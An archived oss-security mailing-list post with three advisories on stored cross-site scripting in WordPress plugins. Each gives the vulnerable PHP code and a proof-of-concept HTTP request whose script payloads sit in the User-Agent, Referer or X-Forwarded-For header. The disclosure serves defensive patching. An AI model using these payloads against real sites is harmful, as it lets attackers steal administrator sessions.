Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 17 Jul 2016 09:59:27 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple stored Cross-Site Scripting vulnerabilities affecting three
 WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.


------------------------------------------------------------------------
Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the Bot Blocker
functionality of the All in One SEO Pack WordPress Plugin (1+ million
active installs). This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0027

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the All in One SEO Pack [2]
WordPress Plugin version 2.3.6.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in version 2.3.7 of the plugin.

Free version https://wordpress.org/plugins/all-in-one-seo-pack/
Pro version https://semperplugins.com/all-in-one-seo-pack-pro-version/

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
All in One SEO Pack [2] is reportedly the most downloaded plugin for
WordPress. It allows users to automatically optimize their site for
Search Engines. A stored Cross-Site Scripting vulnerability exists in
the Bot Blocker functionality.


------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability exists in the Bot Blocker
functionality of the All in One SEO Pack WordPress Plugin (1+ million
active installs). Particularly interesting about this issue is that an
anonymous user can simply store his XSS payload in the Admin dashboard
by just visiting the public site with a malformed User Agent or Referrer
header.

The SEO Pack Bot Blocker functionality can be used to prevent certain
bots from accessing/crawling the website. Bots can be detected based on
User Agent and Referrer header patterns. When the User Agent contains
one of the pre-configured list of bot names like "Abonti", "Bullseye" or
"Exabot" the request is blocked and a 404 is returned.

If the "Track Blocked Bots" setting is enabled (not by default), blocked
request are logged in that HTML page without proper sanitization or
output encoding, allowing XSS.

The affected resource:
/all-in-one-seo-pack/modules/aioseop_bad_robots.php

if ( $this->option_isset( 'block_bots' ) ) {
	if ( !$this->allow_bot() ) {
		status_header( 503 );
		$ip = $_SERVER['REMOTE_ADDR'];
->		$user_agent = $_SERVER['HTTP_USER_AGENT'];
->		$this->blocked_message( sprintf( __( "Blocked bot with IP %s --
matched user agent %s found in blocklist.",
->		'all-in-one-seo-pack' ), $ip, $user_agent ) );
		exit();
	} elseif ( $this->option_isset( 'block_refer' ) &&
$this->is_bad_referer() ) {
		status_header( 503 );
		$ip = $_SERVER['REMOTE_ADDR'];
->		$referer = $_SERVER['HTTP_REFERER'];
->		$this->blocked_message( sprintf( __( "Blocked bot with IP %s --
matched referer %s found in blocklist.",
->		'all-in-one-seo-pack' ), $ip, $referer ) );
	}
}


The resulting HTML code:

<span class="aioseop_option_input"><div class="aioseop_option_div"
><pre>2016-07-05 18:59:37 Blocked bot with IP 172.16.232.1 -- matched
user agent Abonti </pre><script>alert(1);</script>found in blocklist.



------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
1/ Go to the "Bad Bot Blocker" settings page in All in one SEO menu.
2/ Enable "Block Bad Bots using HTTP" and/or "Block Referral Spam using
HTTP".
3/ Send exploit request (with payload in referer or user-agent) to the
server. Anywhere.
Make sure to send your exploit request as an anonymous user. When you
are logged in (have cookies), you are never seen as a bot.
4/ If all set up ok, your request will be blocked (HTTP/1.1 503 Service
Unavailable)
5/ Open the "Bad Bot Blocker" settings page as WP admin.
6/ Your payload will run, since it is logged in a <pre> tag.

Potential use "Track Blocked Bots" setting to show/hide the <pre> block.
Not needed for payload to run. Payload can be set in User-Agent or
Referer field

REQUEST:

GET / HTTP/1.1
Host: 172.16.232.130
User-Agent: Abonti </pre><script>alert(1);</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.232.130/</pre><script>alert(1);</script>
Connection: close
Cache-Control: max-age=0

RESPONSE:

HTTP/1.1 503 Service Unavailable
Date: Tue, 05 Jul 2016 19:31:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
[2] https://wordpress.org/plugins/all-in-one-seo-pack/
[3] https://semperplugins.com/all-in-one-seo-pack-pro-version/
------------------------------------------------------------------------
Persistent Cross-Site Scripting in WordPress Activity Log plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting (XSS) vulnerability has been found in the
WordPress Activity Log plugin. By using this vulnerability an attacker
can inject malicious JavaScript code into the application, which will
execute within the browser of any user who views the Activity Log, in
general WP admin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0037

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Activity Log plugin [2]
version 2.3.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in version 2.3.2 of the WordPress Activity Log
plugin. The updated plugin can be downloaded from the following
location:
https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress Activity Log plugin [2] allows monitoring and tracking of
site activity on a WordPress site. A stored Cross-Site Scripting
vulnerability has been discovered in the WordPress Activity Log plugin
which allows an unauthenticated attacker to inject malicious JavaScript
code into the application, which will execute within the browser of any
user who views the Activity Log (WP admin).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The WordPress Activity Log plugin fails to sufficiently check input
supplied to the X-Forwarded-For HTTP header and perform output encoding
when the input is presented in a "wrong password event".  As a result
the malicious request will be stored in the Activity Log page, executing
the payload when an unsuspecting user views this specific page. 

An attacker can use this vulnerability to perform a wide variety of
actions, such as stealing victims' session tokens or login credentials,
performing arbitrary actions on their behalf, and logging their
keystrokes or deliver malware.

Persistent Cross-Site scripting flaws are typically more serious than
reflected vulnerabilities because they do not require a separate
delivery mechanism in order to reach target users (victims).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
This vulnerability can be demonstrated by submitting an XFF header
similar to the following:
POST /wp-login.php HTTP/1.1
Host: 192.168.28.135
Content-Length: 113
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5)
AppleWebKit/537.36
(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
X-Forwarded-For: <script>alert(document.cookie);</script>
Connection: close
 
log=wordpress&pwd=sdsdssdsdsd&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.28.135%2Fwp-admin%2F&testcookie=1

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wordpress_activity_log_plugin.html
[2] https://wordpress.org/plugins/aryo-activity-log/
[3] https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip
------------------------------------------------------------------------
Persistent Cross-Site Scripting in WP Live Chat Support plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting (XSS) vulnerability has been found in
the WP Live Chat Support plugin. By using this vulnerability an attacker
can inject malicious JavaScript code into the application, which will
execute within the browser of the victim. This allows the attacker to
perform actions on behalf of a logged on WordPress user in order to
perform a wide variety of actions, such as stealing victims' session
tokens or login credentials, performing arbitrary actions on their
behalf, and logging their keystrokes.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0008

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Live Chat Support [2] WordPress
plugin version 6.2.00.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in version 6.2.02 of the WP Live Chat Support
plugin. The updated plugin can be downloaded from the following
location:
https://downloads.wordpress.org/plugin/wp-live-chat-support.zip

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WP Live Chat Support [2] allows chatting with visitors of a WordPress
site. A persistent Cross-Site Scripting vulnerability has been
discovered in the WP Live Chat Support allowing an attacker to execute
actions on behalf of a logged on WordPress user.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The WP Live Chat Support plugin uses the Referer header to present the
current page on which the chat is initiated to backend (wp-admin) chat
users. However, the URL retrieved from the database isn't properly
output encoded according to output context (JavaScript and HTML). As a
result persistent Cross-Site Scripting is introduced.

$wpdb->insert(
	$wplc_tblname_chats,
	array(
			'status' => '5',
			'timestamp' => current_time('mysql'),
			'name' => $name,
			'email' => $email,
			'session' => $session,
			'ip' => maybe_serialize($user_data),
			'url' => $_SERVER['HTTP_REFERER'],
			'last_active_timestamp' => current_time('mysql'),
			'other' => maybe_serialize($other),
	),
	array(
			'%s',
			'%s',
			'%s',
			'%s',
			'%s',
			'%s',
			'%s',
			'%s',
			'%s'
	)
);

The PHP code of the vulnerable output (HTML and JS context) is as
follows:
echo "      <span class='part1'>" . __("Chat initiated on:",
"wplivechat") . "</span> <span class='part2'>" . $result->url .
"</span>";

The PHP code for the page is as follows:
</span> <a href='"+v_browsing_url+"'
target='_BLANK'>"+v_browsing+"</a><br /><span
class='wplc-sub-item-header'>Email:</span> <a href='mailto:"+v_email+"'
target='_BLANK'>"+v_email+"</a></span>";

The malicious code supplied by an attacker can be used to perform a wide
variety of actions, such as stealing victims' session tokens or login
credentials, performing arbitrary actions on their behalf, and logging
their keystrokes.

Stored Cross-Site scripting flaws are typically more serious than
reflected vulnerabilities because they do not require a separate
delivery mechanism in order to reach target users. The victim
(potentially even WP-admin) only has to view the wplivechat-menu page
which generally is the first page when the plugin is opened.

http://<wordpress site>/wp-admin/admin.php?page=wplivechat-menu

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
This vulnerability can be demonstrated by intercepting the
wplc_start_chat action after filling in your name and e-mail and then
changing the Referer header relative path to the Cross-Site Scripting
payload.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.28.129
Content-Length: 117
Accept: */*
Origin: http://192.168.28.129
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103
Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.28.129/'"><img src=x
onerror=alert(document.cookie)>/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
Cookie: wplc_cid=1742; wplc_name=Guest; wplc_email=no%20email%20set;
wplc_chat_status=5; iflychat_guest_id=1467535930we14g;
iflychat_guest_session=320f0212654acf6216884952f5766c7b;
iflychat_guest_name=Guest%20Norene; iflychat_key=undefined;
iflychat_css=undefined; iflychat_time=1467535929896; wplc_hide=
Connection: close
	
action=wplc_start_chat&security=5d2beba087&name=Sahin&email=han.sahin%40securiy.nl&cid=1742&wplcsession=1467535929687

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wp_live_chat_support_plugin.html
[2] https://wordpress.org/plugins/wp-live-chat-support/
[3] https://downloads.wordpress.org/plugin/wp-live-chat-support.zip

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ